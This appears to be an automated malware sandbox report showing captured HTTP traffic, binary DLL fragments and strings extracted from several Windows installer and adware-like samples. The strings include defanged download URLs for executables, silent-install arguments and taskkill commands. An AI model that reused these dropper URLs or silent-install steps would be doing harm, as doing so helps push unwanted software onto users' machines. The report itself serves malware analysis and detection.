ETag: 44edff85d12e091f0b129f05a3f2a042<br>

Last-Modified: Tue, 06 May 2014 07:48:08 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:49 GMT<br>

Age: 127239<br>

Content-Range: bytes 491520-924495/924496<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: 45FD47DB9BA063A62A2F1AF299C66DD6<br>

x-bs-request-id: MTAuNDYuMTU3LjIzOjgwODA6MTU1MDU3MDk3NDoyOC9KdWwvMjAxNCAyMjo1ODo0MyA=<br>

x-bs-meta-crc32: 3569711378<br>

Content-MD5: 44edff85d12e091f0b129f05a3f2a042<br>

x-bs-client-ip: MTgwLjc2LjIyLjc1<br><pre>.F..N.;.}..........F....'.F.;.u....P...u-...F...<....N.......F..PW.<br>...........{....G.;G...B....8.u.....G...;G...,....8...#.......G.......<br>...........MT..}(....u"j..Q......;[email protected](.E(PW.4O.....<br>.........G.;G........8 ..........G............G.;G..M0s...<.s......<br>..Q..G....Q....D..:........MT..G.;G...d....8(..[.......G.......X....U8<br>RW.q..........c....MT..G.;G...&....81..........G..................U@RW<br>.................MT..G.;G........8:..........G..................MT .}H<br>....u"j.........;[email protected].:N..............G.;G...s<br>....8B..j.......G...........ue.MT@.}L....u"j.........;[email protected].<br>..3..EL.ELPW..M.......tE.G.;G.......9_ ......._..G.._^]..[...........t<br>..U.RPW................_^]2.[.................M...........>........<br>.......j.h....d.....PQSUVW.....3.P.D$.d......L$..|$(3..]..G.;G.s......<br>s........G..O.........D...G.;............ ......................t$....<br>.F..N.;.}..........F....I.F.;.u....P....)...^.jP.>.......D$(;..l$ t<br>..........3..V.......^..D$ ....PW..........tn.G.;G.s..8.u.....G..x....<br>.;W.......9o .......o.._....L$.d......Y_^][..............t..T$....RPW.<br>(..............2............V.t$..F.;F.sH.....sA.......L$..F..F,..F,;F<br>0.8.D$.WP....9...L$.V...J.....t..~..u._2.^..T$.R....B....u.2.^.W....9.<br>..F,..~.....F,_..^...............D$..L$..........=....s....A..#[email protected].<br>.........A....A...QP..5.....V.t$..N(......s......P.......^.PQ..5.....P<br>.......^.............D$..L$..........=....s....A..#[email protected]..<br>..A...QP.q5.....V.t$..N.......s......P...A...^.PQ.H5.....P...-...^</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=786432-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>

Date: Sat, 09 Aug 2014 06:25:46 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 786432-924495/924496<br>

Content-Length: 138064<br>

Age: 676482<br>

Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>....................(.......D...........([email protected].<br>..................@...................(................... .......P...<br>T...............`...........................................t.......`.<br>..................@...................`...........(.......`...........<br>............(...............8...T...(.......D.......t.................<br>..........@...(...................(.......(...........(.......D.......<br>............(.......................................................x.<br>..(...P.......8...|...............................@...........(.......<br>H...L...............H...L...............\...x...(...P.......8...|.....<br>[email protected]...................(...............<br>........................................t...|...P.......8...|.........<br>......................@...........(.......H...H...............H...H...<br>............X...t...|...P.......8...|[email protected].<br>......h...................L...........................................<br>............x...........$.......8.......(...........................@.<br>..........L.......X...H...............X...H...............X...x.......<br>[email protected].............<br>......(.......................................................t.......<br>P.......8...|...............................@...........(.......P...H.<br>..............P...H...............X...t.......P.......8...|.......P...<br>[email protected]...................(.....................<br>..........................................8...|...................</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=688128-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Mon, 08 Sep 2014 06:25:46 GMT<br>

Date: Sat, 09 Aug 2014 06:25:46 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 688128-924495/924496<br>

Content-Length: 236368<br>

Age: 676483<br>

Via: 1.0 wzpy220:8080 (Cdn Cache Server V2.0), 1.0 shiben10:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>[email protected].../....T$..B..J.3.......8D...0........M...@<br>[email protected]..]/...T$...l.....h...3..w....\D...............<br>[email protected]$..B..J.3..H.....D.....................T$..B..J.3.. ....<br>.E.............T$..B..J.3.......hE...q.........E.P.M.Q.s........T$..B.<br>[email protected]...?...E.P.M.Q.;........T$..B..J.3.......J.3<br>........F..........E.P.....Y..E.P.....Y..E.P.....Y..E.P.....Y..T$..B..<br>J.3..D....|F.................M.....U....T$..B..J.3........F...........<br>.......M...>...M...>...M...>...M...>...M...>...E.......<br>....e...M...>....T$..B..J.3........F... ........M..x>...T$..B..J<br>[email protected]$..B..J.3..X....J.3..N.....G.<br>..........M..xY...M...... ...M...8.B....M...`......M...p......M.......<br>......M.............M.............M.............M........&....M.......<br>......M.............M...,.........T$..B..J.3.......HH.........M..8....<br>T$..B..J.3..h.....H.....................M...,..........=..........=...<br>M...=..........<..........<....T.....<...M...<..........&l<br>t;...M...<....p.....<....8.....<..........<...T$..........<br>...3........I...(.................h....u<....h....j<...M..b<.<br>..M..Z<...M..R<...M..J<...T$...X.....T...3..T.....I..........<br>..............<..........<..........;..........;..........;.....<br>.....;..........;..........;..........;..........;..........;.........<br>.;..........;..........;.........{;.........p;.........e;....$....Z;..<br>.T$.........|...3..d.....I.................M..(;...M.. ;...M...;..</pre><<< skipped >>></font><br><br

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_188:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll

_dubo_001.exe"

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\NSISdl.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

.reloc

System.dll

callback%d

BBB.DDD

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

&hXXps://VVV.globalsign.com/repository/03

"hXXp://crl.globalsign.net/root.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

&hXXps://VVV.globalsign.com/repository/0

-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0P

4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt0

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

{Z%2X

WL6.VA

fl.Ll4i

X.OV h

nsi3.tmp

5.exe

001.exe"

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp

%original file name%.exe

c:\%original file name%.exe

%Program Files%\erty7

1\Temp\nsi3.tmp\hgds8

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%Program Files%\updatr

adwoca_00005.exe

01.exe

hXXp://yunbo.luopf.cn/adwoca_00005.zip

01.zip

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.45</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

2014.07.27.150521

%original file name%.exe_188_rwx_10004000_00001000:

callback%d

guagua_77150006814.exe_1016:

.text

`.rdata

@.data

.rsrc

t.Ht4

.\ConfigDlg.cpp

GuaGua\ServiceClient.exe

Player\DefCamSetup.dll

CamerDll:%s

dbghelp.dll

%sddd_ddd.dmp

CGuaGuaMsgBoxDlg

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\%s.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

.\ImageMgr.cpp

Resource%d

FirstImage %s

LastImage %s

Image%d

%c:\Program Files\

.\ProductInfoMgr.cpp

GetAllProductInfo %d

hXXp://admin.downloader.re63.cn/downcontainer/downLoadList.do

log\1.xml

hXXp://admin.downloader.re63.cn/downcontainer/downLoadForGuaGua.do

%s?id=%s&recid=%I64d

%s?recid=%I64d

log\2.xml

installUrl

installUrl2

licenseUrl

LoadConfig %d

App GetProductInfo(%s) Error %d

hXXp://img001.com/business/kele.exe

hXXp://img001.com/business/qixi.exe

hXXp://img001.com/business/qiji.exe

hXXp://img001.com/business/juxing.exe

hXXp://img001.com/business/pingguo.exe

hXXp://img001.com/business/caihong.exe

hXXp://d.re71.cn/business/kele.exe

hXXp://d.re71.cn/business/qixi.exe

hXXp://d.re71.cn/business/qiji.exe

hXXp://d.re71.cn/business/juxing.exe

hXXp://d.re71.cn/business/pingguo.exe

hXXp://d.re71.cn/business/caihong.exe

hXXp://VVV.%s.com

hXXp://cj.%s.com/downloader/

hXXp://img001.com/business/guagua_setup.exe

hXXp://img001.com/business/guagua_dance_setup.exe

GuaGua\GuaGua.exe

Dance\ChatHall.exe

hXXp://cj.guagua.cn/downloader/

ChatHall.exe

UpdateConfig Success%d

hXXp://download.re63.cn

LoadCookie %d

LoadCookie: RecommendStr=%s

%d:%I64d:%d

UpdateConfig RecType:%d, RecId:%I64d, Ad:%d

HMAFROMURL

UpdateConfig: SourceUrl=%s

UpdateConfig: WebID=%s

G1.0.0

%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d

%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s

%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&dltime=%d&insttime=%d&homepage=%d&recinst=%d

%s%s?dlver=%s&pname=%s&pver=%s&cmdtype=%d&cmdid=%I64d&ad=%d&oemid=%d&fromurl=%s&webid=%s&err=%d

rec_type:%d,

rec_ad:%d,

src_url:%s,

web_id:%s,

.\ReptThread.cpp

Rept %s Result [%d, %d]

%slog\ddd ddd.log

.\SetupTool.cpp

CSetupToolApp %d

CImageMgr::Instance().LoadFromServer()

CImageMgr::Instance().LoadFromServer() Success

/S /AUTOSTART=%s /COMMENDER_ID=%s /D=%s

.\SetupToolDlg.cpp

Launch InstallProgram: %s %s

State=%d

nCount=%d,currentImage=%d

GuaGua\ServiceClient.dll

Call LaunchGuaGua(%s)

Exec %s [%d]

-%%

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\Path.cpp

ExecApp %s %s [%d]

[%d, %d]: %s

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\ColorCheckButton.cpp

Checked %d

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\BitmapFile.cpp

CBitmapFile::Open(%s)

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadManager.cpp

InternalDownloadFile() break=%d

SupportBreakDownload

Begin SupportBreakDownload

End SupportBreakDownload bThreadFinish=%d

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\DownloadThread.cpp

Begin OnExecute GetUnfinishBytes nId=%d

End OnExecute GetUnfinishBytes nId=%d

End OnExecute Receive nId=%d

Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\HttpClass.cpp

CHttpClass SetOption

CHttpClass SetOption Finish

GetHttpFile(%s, %s) error: [%d,%d]%s

SendHttpMsg %d

SendHttpMsg %d %s

SendHttpMsg(%s) error: [%d,%d]%s

User-Agent: %s

Content-Type: application/x-www-form-urlencoded

PostHttpMsg(%s) error: [%d,%d]%s

GetHttpFileInfo(%s) error: [%d,%d]%s

HttpRangeRequest(%s, %I64d, %I64d) error: [%d,%d]%s

HttpRequest(%s) error: [%d,%d]%s

ReceiveBytes(%d) error: [%d,%d]%s

\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\Common\OutputFile.cpp

%s, %d

%s, length = %I64d err = %d

COutputFile::WriteData(%I64d, %d)

d:d:d:d

File: %s

Line:%d

Cond: ASSERT( %s );

Condition: ASSERT( %s );

SourceFile: %s

LineNum: %d

COMCTL32.DLL

hhctrl.ocx

commctrl_DragListMsg

CCmdTarget

CNotSupportedException

ntdll.dll

kernel32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

%s.dll

CHttpConnection

CHttpFile

hXXp://

WININET.DLL

HTTP/1.0

MSWHEEL_ROLLMSG

user32.dll

ole32.dll

mscoree.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

OLEACC.dll

f:\New_Login\GuaGua\trunk\Client\OnlineSetupV2_GuaGua\GuaGuaShow\GuaGuaRelease\SetupTool.pdb

GetCPInfo

KERNEL32.dll

CreateDialogIndirectParamA

GetKeyState

UnhookWindowsHookEx

SetWindowsHookExA

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

comdlg32.dll

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegEnumKeyExA

RegOpenKeyA

RegDeleteKeyA

RegEnumKeyA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

ShellExecuteExA

SHELL32.dll

COMCTL32.dll

UrlUnescapeA

SHLWAPI.dll

oledlg.dll

OLEAUT32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

HttpAddRequestHeadersA

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

WININET.dll

GdipSetImageAttributesColorKeys

GdiplusShutdown

gdiplus.dll

WS2_32.dll

.PAVCObject@@

.PAVCException@@

.PAVCINETException@@

.PAVCInternetException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCSimpleException@@

.PAVCResourceException@@

.PAVCOleException@@

.PAVCMemoryException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.PAVCArchiveException@@

.PAVCFileException@@

.PAVCOleDispatchException@@

zcÁ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\log\20140817 052007.log

05:20:20:819

LastImage hXXp://img001.com/tg_pic/mobo14-1-9.png

ame=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= Result [1, 200]

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\guagua_77150006814.exe

(*?@@?*&

%.CC5!

a%f#hA

?%C;%

4.Rh5|

\^.ao

V%Fhb>

bPPn-k%%D*

Aj.HM

<y#&%Dut

o.LM%

|%<.VyNS

C%UQf*u

.CAQA

HM%FWP,

am.HM

H<8")u%Un

K5H.umE5

4]mn.znpdd

MD.pl

U]%s^

Jt.MS

KAr%s

l.QfV

8HÅc

lx\/`ckc#u.sQsxE

.XB=8

%x$4/

.WF5l

.Oae(

7i%u0

version="1.0.0.0"

<requestedExecutionLevel

<!--The ID below indicates application support for Windows Vista -->

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<!--The ID below indicates application support for Windows 7 -->

<!--supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/-->

accKeyboardShortcut

1.1.0.0

GirlShow.exe

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

#Unable to load mail system support.

Ainqngz5.2.exe_1136:

.text

`.data

.rsrc

MSVBVM60.DLL

"44)*612

urlww

.FlGc

%smzCz

SHDocVwCtl.WebBrowser

#vb6chs.dll

ieframe.dll

WebBrowser

%Program Files%\VB

\VB6.OLB

C:\Windows\System32\mshtml.tlb

winmm.dll

C:\Windows\System32\ieframe.oca

advapi32.dll

RegCloseKey

RegCreateKeyA

RegOpenKeyA

wininet.dll

InternetOpenUrlA

GetUrlSource

VBA6.DLL

sUrl

v.baofeng.com

99999999999

hXXp://order.5bo.com/

hXXp://wpa.qq.com

hXXp://VVV.baidu.com/

hXXp://hzf.v.baofeng.com/#

hXXp://hzf.v.baofeng.com/

"url":"

"swfurl":"

hXXp://

hXXp://tv.aiqingzhihui.com/zhibo2.html?id=

\setings.ini

candid.exe

cmd.exe /c taskkill /im

qq.com

hXXp://tv.aiqingzhihui.com/zhibo2.html

hXXp://y.qq.com/player

pptv.com

sohu.com

56.com

ifeng.com

youku.com

ku6.com

tudou.com

cntv.cn

iqiyi.com

wasu.cn

pps.tv

letv.com

imgo.tv

kankan.com

sina.com.cn

m1905.com

hz.letv.com

tv.sohu.com

baofeng.com

Ainqngz4.7.exe

candid.exe_1548:

.text

`.data

.rsrc

MSVBVM60.DLL

[11<1<0@

[:<>><<<

y%D:To

SHDocVwCtl.WebBrowser

#vb6chs.dll

ieframe.dll

WebBrowser

%Program Files%\VB

\VB6.OLB

]! 2C:\Windows\System32\ieframe.oca

C:\Windows\System32\mshtml.tlb

winmm.dll

VBA6.DLL

RegCreateKeyA

advapi32.dll

RegCloseKey

RegOpenKeyA

wininet.dll

InternetOpenUrlA

GetUrlSource

C:\Windows\system32\msvbvm60.dll\3

NotifyMsgBox

user32.dll

oleaut32.dll

kernel32.dll

WebBrowser2

WebBrowser1

)o4.tr

sUrl

\Ainqngz5.2.exe

\setings.ini

\Ainqngz4.0.exe

hXXp://aimini.aiqingzhihui.com/ta2/?flag=

hXXp://aimini.aiqingzhihui.com/ta3/?flag=

hXXp://aitime.aiqingzhihui.com/newh1/?

hXXp://aitime.aiqingzhihui.com/newh2/?2

hXXp://aitime.aiqingzhihui.com/newh3/?3

hXXp://aimini.aiqingzhihui.com/new/?

hXXp://aimini.aiqingzhihui.com/new/?2

hXXp://aimini.aiqingzhihui.com/ta1/?flag=

Ainqngz5.2.exe

C:\\Program Files\\Internet Explorer\\IEXPLORE.exe

cmd.exe /c taskkill /im

hXXp://aimini.aiqingzhihui.com/new/?flag=

hXXp://aitime.aiqingzhihui.com/dnewh1/?flag=

hXXp://aitime.aiqingzhihui.com/dnewh2/?flag=

hXXp://aitime.aiqingzhihui.com/dnewh3/?flag=

hXXp://aitime.aiqingzhihui.com/newh1/?flag=

hXXp://aitime.aiqingzhihui.com/newh2/?flag=

hXXp://aitime.aiqingzhihui.com/newh3/?flag=

hXXp:///

kinetic.exe

BaiduAnSvc.exe_3884:

.text

`.rdata

@.data

.rsrc

@.reloc

T$xRSSh

;9u.SWj

8.uwS

n<.ut

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

CHECK failed: (from.GetDescriptor()) == (descriptor):

..\src\google\protobuf\message.cc

: Tried to copy from a message with a different type.to:

..\src\google\protobuf\io\coded_stream.cc

..\src\google\protobuf\generated_message_reflection.cc

..\src\google\protobuf\wire_format.cc

..\src\google\protobuf\reflection_ops.cc

..\src\google\protobuf\descriptor.cc

". To use it here, please add the necessary import.

", which is not imported by "

$0$1 = $2

$0$1 $2 $3 = $4

.PLACEHOLDER_VALUE

.placeholder.proto

map key must name a scalar or string field.

map_key must not name a repeated field.

CHECK failed: dynamic.get() != NULL:

.foo = value".

.dummy

FieldDescriptorProto.extendee set for non-extension field.

FieldDescriptorProto.extendee not set for extension field.

Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "

CHECK failed: !out.HadError():

" is repeated. Repeated options are not supported.

Import "

Missing field: FileDescriptorProto.name.

File recursively imports itself:

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

\xx

..\src\google\protobuf\stubs\strutil.cc

..\src\google\protobuf\extension_set.cc

CHECK failed: iter != extensions_.end():

..\src\google\protobuf\extension_set_heavy.cc

..\src\google\protobuf\descriptor.pb.cc

google/protobuf/descriptor.proto

google/protobuf/descriptor.proto

google.protobuf"G

2$.google.protobuf.FileDescriptorProto"

2 .google.protobuf.DescriptorProto

2$.google.protobuf.EnumDescriptorProto

2'.google.protobuf.ServiceDescriptorProto

2%.google.protobuf.FieldDescriptorProto

.google.protobuf.FileOptions

.google.protobuf.SourceCodeInfo"

2/.google.protobuf.DescriptorProto.ExtensionRange

.google.protobuf.MessageOptions

2 .google.protobuf.FieldDescriptorProto.Label

2*.google.protobuf.FieldDescriptorProto.Type

.google.protobuf.FieldOptions"

2).google.protobuf.EnumValueDescriptorProto

.google.protobuf.EnumOptions"l

2!.google.protobuf.EnumValueOptions"

2&.google.protobuf.MethodDescriptorProto

.google.protobuf.ServiceOptions"

.google.protobuf.MethodOptions"

2).google.protobuf.FileOptions.OptimizeMode:

2$.google.protobuf.UninterpretedOption":

2$.google.protobuf.UninterpretedOption*

2#.google.protobuf.FieldOptions.CType:

experimental_map_key

2$.google.protobuf.UninterpretedOption"/

2-.google.protobuf.UninterpretedOption.NamePart

2(.google.protobuf.SourceCodeInfo.Location

com.google.protobufB

Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:

..\src\google\protobuf\io\tokenizer.cc

Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:

Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:

..\src\google\protobuf\stubs\substitute.cc

..\src\google\protobuf\dynamic_message.cc

..\src\google\protobuf\text_format.cc

..\src\google\protobuf\descriptor_database.cc

Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h

config_service.proto

.\BDMConfig\Protocol\config_service.pb.cc

config_service.proto"(

cmd_list

.ConfigItem"@

.ResultSet

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h

c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

1.0.0.1

.\header.pb.cc

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z

BDMBase.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

BDMStringUtils.dll

?BDMMsgGetModule@@YGJPAPAX@Z

BDMMsg.dll

BDMSkin.dll

KERNEL32.dll

USER32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

ADVAPI32.dll

SHFileOperationW

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

MSVCP80.dll

PSAPI.DLL

WS2_32.dll

SHLWAPI.dll

MSVCR80.dll

_amsg_exit

_crt_debugger_hook

USERENV.dll

WTSAPI32.dll

HttpSendRequestW

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

WININET.dll

NETAPI32.dll

BDMTinyXml.dll

RegOpenKeyExA

BaiduAnSvc.exe

.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@

.?AVCRtpPluginContainer@@

.?AV?$CSingleton@VCRTPServer@@@utils@@

.?AVCRTPServer@@

.?AVCBDMOptionsReportRecord@@

.?AVCBDMLauchReportRecord@@

.?AVCCmdPluginLauncher@@

.?AVCExePluginLauncher@@

.?AVIPluginCmdExecutor@@

.?AUPluginInfoPassiveSaver@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

ÿF=

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>

5%6s6

7 828=8{8

;'</<5<]<

4%5X5b5w5

8!8'8-838

050=0"151

9!:4:]:|:

5h6D6~6s7

2%3U3

2&2-2:2?2

> >$>(>,>0>4>8>

4 4$4(4,40444]4

5"6 656]6

1$2-23292

8%9U9z9

0%0U0u0

5 5$5(5,5054585<5

9 9$9(9,9094989<9@9

1 1$1(1,10181|1

\PluginSetup.xml

/handle=%d /supplyid=%d /installmode=2 /S /D=%s

BDMDownload.dll

PackCache.xml

##cmd:

UninstalledPlugins.xml

%d.%d

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

